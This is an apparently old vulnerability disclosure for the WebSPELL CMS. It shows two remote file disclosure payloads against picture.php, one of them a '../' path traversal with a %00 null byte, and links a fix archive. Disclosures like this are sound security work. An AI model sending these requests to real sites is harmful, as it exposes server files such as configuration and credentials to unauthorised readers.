# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability # Discovered by: Trex # Visit: www.Trex-Online.net / www.UnderGround.ag # Comment: Happy easter! # # ___ ___ # / \ / \ ___________________________ # / / \_/ \ \ / \ # \__/\ /\__/ / GIVE ME A CARROT OR I WILL \ # \O O/ \ BLOW UP YOUR HOUSE / # ___/ ^ \___ / ___________________________/ # \___/ /_/ # _/ \_ # __// \\__ # /___\/_\/___\ # # # # Vulnerability 1: # Advantage: works independently from PHP version. # Disadvantage: works dependently from PHP option register_globals (= on). # # http://[SITE][PAHT]/picture.php?file=[FILE] # # # # Vulnerability 2: # Advantage: works independently from PHP option register_globals. # Disadvantage: works dependently from PHP versions (< 4.3.0). # # http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00 # # # # Solution: # http://fixes.trex-online.net/picture.rar